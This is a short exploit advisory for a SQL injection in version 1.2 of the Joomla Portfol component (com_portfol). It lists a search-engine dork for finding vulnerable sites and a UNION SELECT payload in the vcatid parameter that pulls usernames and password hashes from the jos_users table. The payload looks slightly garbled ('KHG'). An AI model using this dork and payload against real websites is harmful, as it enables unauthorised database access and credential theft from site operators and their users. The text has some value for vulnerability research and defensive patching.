Joomla Portfol SQL Injection

`#############################################################################  
# #  
# Joomla Component Portfol SQL Injection Vulnerability #  
# #  
#############################################################################  
  
  
########################################  
  
[~] Vulnerability found by: Valon Kerolli  
[~] Contact: valon[at]itshqip.com  
[~] Site: www.itshqip.com  
  
########################################  
  
[~] ScriptName: "Joomla"  
[~] Component: "Portfol (com_portfol)"  
[~] Version: "1.2"   
[~] Date: "20.10.2006"  
[~] Author: "mivaco"  
[~] Author E-mail: "[email protected]"  
[~] Author URL: "www.mivaco.com"  
  
########################################  
  
[~] DORK: inurl:"com_portfol"   
  
########################################  
  
[~] Exploit: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=[SQL]  
[~] Example: /index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)KHG+from+jos_users--  
  
########################################  
`